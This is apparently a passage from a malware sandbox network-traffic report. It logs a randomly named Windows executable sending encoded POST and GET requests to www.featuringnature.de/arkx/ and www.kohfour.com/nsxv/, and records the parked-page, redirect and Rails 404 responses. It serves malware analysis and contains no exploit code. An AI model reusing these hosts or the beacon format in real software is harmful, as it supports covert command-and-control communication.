6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aTE9tiCm+O+OLCC2MObjFajn4X/pKZhEdayK2IXV5lkVOoEouigKukITTqOf6FTBPj/Io4wvH0P8dOUXUJFKFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:40.641407013 CEST979INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWE0NDY5MjUtMzJmYy00MzYzLWJkMjktNmQyODc3NTYwMjFjIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.7497363.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:45.728841066 CEST766OUTPOST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 76 78 44 75 43 61 50 4c 50 32 36 69 7a 55 68 6b 6f 53 54 36 4f 53 2f 46 73 4f 72 52 71 47 59 48 44 48 50 55 4b 7a 79 58 58 6f 73 4e 4d 4e 56 49 34 57 77 2f 73 30 72 69 36 34 6c 61 77 4d 54 6d 48 6b 64 45 49 4c 74 6f 33 41 77 34 5a 39 46 5a 32 48 6e 2b 6f 53 6a 2f 4d 6d 51 73 4c 46 2f 7a 6f 71 57 66 4c 56 4d 65 34 68 64 66 46 5a 49 65 65 6d 2f 47 7a 6e 43 55 5a 5a 64 75 65 62 37 52 67 43 61 77 69 62 51 46 74 42 4d 75 58 52 53 45 61 35 31 32 6e 65 4b 7a 48 6d 74 4a 45 39 2b 72 4d 6c 4e 58 74 41 78 36 7a 6d 67 71 42 74 38 73 61 31 63 6f 48 77 47 76 50 43 77 6e 49 73 52 36 39 6b 72 59 4a 4b 79 48 38 4e 71 42 6c 35 44 7a 6a 67 3d 3d
                                  Data Ascii: 4h=vxDuCaPLP26izUhkoST6OS/FsOrRqGYHDHPUKzyXXosNMNVI4Ww/s0ri64lawMTmHkdEILto3Aw4Z9FZ2Hn+oSj/MmQsLF/zoqWfLVMe4hdfFZIeem/GznCUZZdueb7RgCawibQFtBMuXRSEa512neKzHmtJE9+rMlNXtAx6zmgqBt8sa1coHwGvPCwnIsR69krYJKyH8NqBl5Dzjg==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.7497373.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:49.279141903 CEST786OUTPOST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 76 78 44 75 43 61 50 4c 50 32 36 69 7a 30 52 6b 71 78 72 36 47 53 2f 45 77 65 72 52 7a 57 59 44 44 48 54 55 4b 32 4b 39 51 65 63 4e 4d 76 4e 49 35 58 77 2f 76 30 72 69 6a 49 6c 6c 74 38 54 74 48 6a 56 69 49 4f 56 6f 33 41 55 34 5a 2f 64 5a 32 57 6e 68 70 43 6a 35 5a 57 51 79 57 56 2f 7a 6f 71 57 66 4c 52 6c 35 34 67 31 66 46 70 34 65 66 48 2f 46 2b 48 43 62 65 5a 64 75 61 62 37 56 67 43 61 43 69 65 4a 65 74 43 6b 75 58 51 69 45 61 6f 31 35 73 65 4b 78 61 32 73 4b 48 34 4c 43 46 46 5a 76 6e 68 64 4a 7a 51 41 7a 45 62 68 4f 41 58 51 45 5a 68 2b 55 4c 41 55 52 66 4b 4d 50 2f 6c 76 41 45 6f 47 6d 6a 36 50 72 6f 72 69 33 31 61 31 37 6b 61 52 72 56 54 44 4d 70 39 4c 69 4e 6b 4e 4c 6f 50 6f 3d
                                  Data Ascii: 4h=vxDuCaPLP26iz0Rkqxr6GS/EwerRzWYDDHTUK2K9QecNMvNI5Xw/v0rijIllt8TtHjViIOVo3AU4Z/dZ2WnhpCj5ZWQyWV/zoqWfLRl54g1fFp4efH/F+HCbeZduab7VgCaCieJetCkuXQiEao15seKxa2sKH4LCFFZvnhdJzQAzEbhOAXQEZh+ULAURfKMP/lvAEoGmj6Prori31a17kaRrVTDMp9LiNkNLoPo=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.7497383.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:51.819689035 CEST1799OUTPOST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 76 78 44 75 43 61 50 4c 50 32 36 69 7a 30 52 6b 71 78 72 36 47 53 2f 45 77 65 72 52 7a 57 59 44 44 48 54 55 4b 32 4b 39 51 65 55 4e 4d 36 5a 49 34 30 49 2f 75 30 72 69 72 6f 6c 6b 74 38 54 77 48 6c 39 2b 49 50 70 57 33 47 51 34 62 63 56 5a 6e 54 48 68 6e 43 6a 35 62 57 51 76 4c 46 2b 70 6f 71 47 62 4c 56 42 35 34 67 31 66 46 72 77 65 4a 6d 2f 46 38 48 43 55 5a 5a 64 69 65 62 37 39 67 43 53 53 69 65 46 4f 73 79 45 75 57 77 79 45 4a 71 74 35 68 65 4b 33 5a 32 73 6f 48 34 50 5a 46 46 46 46 6e 68 70 77 7a 57 77 7a 48 39 6f 30 44 31 52 5a 48 48 33 56 4e 32 77 39 56 36 63 70 36 44 2f 34 45 49 62 49 6d 49 72 65 72 4c 4c 33 38 50 64 37 2b 61 52 44 61 68 33 4d 68 4e 65 73 4a 57 42 65 79 72 54 59 58 68 6b 6d 5a 71 4d 57 4d 32 66 59 50 36 33 74 62 4f 69 4c 78 49 4e 33 47 74 59 79 30 58 69 6a 43 78 50 52 76 66 72 64 4a 32 79 4e 6d 43 42 4d 34 66 43 6e 67 35 51 68 73 73 69 36 4b 51 78 6b 64 73 53 6b 5a 59 4a 4b 7a 52 35 78 75 65 32 45 66 31 69 31 63 4f 39 59 47 67 7a 75 39 68 34 30 43 62 70 5a 75 58 65 [TRUNCATED]
                                  Data Ascii: 4h=vxDuCaPLP26iz0Rkqxr6GS/EwerRzWYDDHTUK2K9QeUNM6ZI40I/u0rirolkt8TwHl9+IPpW3GQ4bcVZnTHhnCj5bWQvLF+poqGbLVB54g1fFrweJm/F8HCUZZdieb79gCSSieFOsyEuWwyEJqt5heK3Z2soH4PZFFFFnhpwzWwzH9o0D1RZHH3VN2w9V6cp6D/4EIbImIrerLL38Pd7+aRDah3MhNesJWBeyrTYXhkmZqMWM2fYP63tbOiLxIN3GtYy0XijCxPRvfrdJ2yNmCBM4fCng5Qhssi6KQxkdsSkZYJKzR5xue2Ef1i1cO9YGgzu9h40CbpZuXe9zCSbHlzhDP8KXeHExa/mh2cT13KRSqcLyqvhl4Kkem0dR1AGivTwCd8SBYHSSwtd7V9q16MaVMTE/ybLcCbDbfLK9EOZikuDY0BlNzsQxs93Yp6wsqzfQJbWcrHRhfdpPK+UbXN8HmU+62Wij/n4EnbfAm//Yd73RitZAdizYJNRcMTd18EoLwB1hzv6ntKJyss4nqbZbROZSf5PkIucbyBs6SPJFUxERihym7MIcKkdI4LpLyXoDBy4Cb4GG75gEuyVaC5mPduzKcLd2UVtEwDMvKtOmDs/dyoHWprOb9TQE1cXTM1hF9UZlllZpAG/x1a47T3ltR/TnarEZWg5r6ydTqSQPSsCtGwI0F2NGIqHdcu47xDsGZ/6Rt2ajv9XuQ35RkBA/xcjQZ0T02W6MHdtOI9KqozznhaOCrkTrIl7aWJ8h3XjLQvgA2L57Z8XSC/AW1Z/CRPvyIS45/sc+1WR90UVdyHGiC8u4m78RC6JF2ZFS/D0GAA5H9vYDkSc+76J3+0e/tKtuP6wF6y2mBJIw5aDnFxsdbMwqK6X0pZriTMRgLWxpZGsJN2dAmEsIjJaLZj4TzrF+3Q42oI1h14kCB2p8mXDPIsNOxcbnjwE3uIel/QEGqC01p+is4gTqOiqafa5X8pgdJ3K5bAN4Jrf01BYzmHwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.7497393.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:54.368149042 CEST493OUTGET /arkx/?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:54.833229065 CEST414INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 27 May 2024 10:35:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 274
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 3d 69 7a 72 4f 42 71 6a 44 47 6e 36 4b 38 31 56 41 71 69 4c 76 64 78 71 37 68 38 6e 39 69 58 59 34 4a 31 75 79 57 69 61 71 55 75 4e 48 4f 76 4e 66 32 48 6f 79 70 6b 2f 68 34 61 74 30 74 64 62 39 62 51 78 54 48 2b 5a 66 38 47 46 47 4d 76 39 63 6e 33 54 43 32 68 36 75 5a 48 49 4c 66 55 6a 58 70 49 4b 6c 56 79 49 66 2f 44 63 74 49 65 35 41 55 31 37 4a 35 7a 65 62 64 38 49 41 45 4b 58 47 6b 43 44 45 74 6f 42 7a 6b 41 64 59 26 36 32 33 3d 59 4c 49 38 76 38 65 58 64 30 59 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.749740216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:00.157306910 CEST745OUTPOST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 6b 61 47 70 53 65 75 58 56 71 6e 65 45 59 6e 6f 70 6f 53 64 6e 41 57 30 6f 71 42 68 45 76 32 54 79 70 4b 58 58 33 4a 69 38 4d 63 5a 73 69 66 71 65 65 68 56 6f 72 47 66 6e 42 44 39 44 69 6d 48 57 5a 4c 66 7a 30 2f 45 57 33 44 2f 56 53 72 45 74 76 56 79 30 53 37 44 41 53 5a 79 67 66 74 2b 73 66 38 4b 52 61 6f 2b 6e 56 6e 5a 38 6d 46 53 39 66 32 64 77 62 7a 6b 52 37 59 74 6d 58 35 56 56 46 32 49 55 74 76 46 49 41 33 4f 43 79 68 6b 45 31 30 77 77 77 50 37 4a 55 62 62 74 63 6e 47 31 5a 77 44 41 6c 59 64 44 7a 63 77 59 65 77 58 41 47 4d 6e 68 65 31 6f 79 64 62 4d 77 32 6e 74 6c 57 77 64 68 37 72 61 44 53 57 46 52 4e 38 50 7a 67 3d 3d
                                  Data Ascii: 4h=kaGpSeuXVqneEYnopoSdnAW0oqBhEv2TypKXX3Ji8McZsifqeehVorGfnBD9DimHWZLfz0/EW3D/VSrEtvVy0S7DASZygft+sf8KRao+nVnZ8mFS9f2dwbzkR7YtmX5VVF2IUtvFIA3OCyhkE10wwwP7JUbbtcnG1ZwDAlYdDzcwYewXAGMnhe1oydbMw2ntlWwdh7raDSWFRN8Pzg==
                                  May 27, 2024 12:36:00.901982069 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 79a5c675-0b3b-4edd-85ca-0e1298f8c6ac
                                  x-runtime: 0.035627
                                  content-length: 18201
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:36:00.902049065 CEST224INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
                                  May 27, 2024 12:36:00.902080059 CEST1236INData Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20
                                  Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
                                  May 27, 2024 12:36:00.902131081 CEST1236INData Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20
                                  Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
                                  May 27, 2024 12:36:00.902183056 CEST1236INData Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 6e 73 78 76 26 71 75 6f 74 3b 3c 2f 68 32 3e
                                  Data Ascii: /header><div id="container"> <h2>No route matches [POST] &quot;/nsxv&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#
                                  May 27, 2024 12:36:00.902230978 CEST1236INData Raw: 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 36 3a 69 6e 20 60 62 6c 6f 63 6b 20
                                  Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a>
                                  May 27, 2024 12:36:00.902266979 CEST836INData Raw: 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 33 22 20 68 72 65 66 3d 22
                                  Data Ascii: ntime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">
                                  May 27, 2024 12:36:00.902318954 CEST1236INData Raw: 66 72 61 6d 65 2d 69 64 3d 22 31 39 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 37 31 38 3a 69 6e 20 60 68 61 6e 64 6c 65 5f 72 65 71 75 65 73 74 26 23 33 39 3b
                                  Data Ascii: frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client&#39;</a><br><a class="trace-frames" data-frame
                                  May 27, 2024 12:36:00.902376890 CEST224INData Raw: 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f
                                  Data Ascii: ><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:28:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">activesupport (5.2.6) lib/active
                                  May 27, 2024 12:36:00.902405024 CEST1236INData Raw: 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                  Data Ascii: _support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">actionpack (5.2.6) lib
                                  May 27, 2024 12:36:00.902700901 CEST1236INData Raw: 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 73 65 6e 64 66 69 6c 65
                                  Data Ascii: <a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-fr


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.749741216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:02.701807976 CEST765OUTPOST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 6b 61 47 70 53 65 75 58 56 71 6e 65 45 37 50 6f 6c 70 53 64 68 67 57 31 6e 4b 42 68 4e 50 32 66 79 70 57 58 58 79 78 49 37 2b 34 5a 73 44 76 71 66 61 4e 56 6c 4c 47 66 76 68 44 79 48 69 6d 63 57 5a 48 58 7a 32 72 45 57 30 2f 2f 56 53 37 45 74 34 42 31 31 43 37 4e 4e 79 5a 77 6b 66 74 2b 73 66 38 4b 52 61 38 55 6e 55 50 5a 2f 57 5a 53 2b 39 4f 65 73 4c 7a 72 48 4c 59 74 78 48 35 52 56 46 33 74 55 6f 4b 71 49 43 66 4f 43 32 6c 6b 45 6b 30 7a 2b 41 50 78 48 30 61 4d 73 75 44 50 37 34 49 38 4d 57 51 68 48 78 70 62 5a 6f 74 31 61 6b 41 4c 2f 50 4e 54 32 66 2f 36 6e 51 36 59 6e 58 30 46 73 5a 66 37 63 6c 7a 76 63 66 64 4c 6c 52 6f 71 58 33 6d 4a 51 5a 6d 48 42 71 45 55 58 6d 55 76 4a 30 49 3d
                                  Data Ascii: 4h=kaGpSeuXVqneE7PolpSdhgW1nKBhNP2fypWXXyxI7+4ZsDvqfaNVlLGfvhDyHimcWZHXz2rEW0//VS7Et4B11C7NNyZwkft+sf8KRa8UnUPZ/WZS+9OesLzrHLYtxH5RVF3tUoKqICfOC2lkEk0z+APxH0aMsuDP74I8MWQhHxpbZot1akAL/PNT2f/6nQ6YnX0FsZf7clzvcfdLlRoqX3mJQZmHBqEUXmUvJ0I=
                                  May 27, 2024 12:36:03.248888969 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 431f0c0c-0669-4d9d-b651-95d48a5a0839
                                  x-runtime: 0.033628
                                  content-length: 18221
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 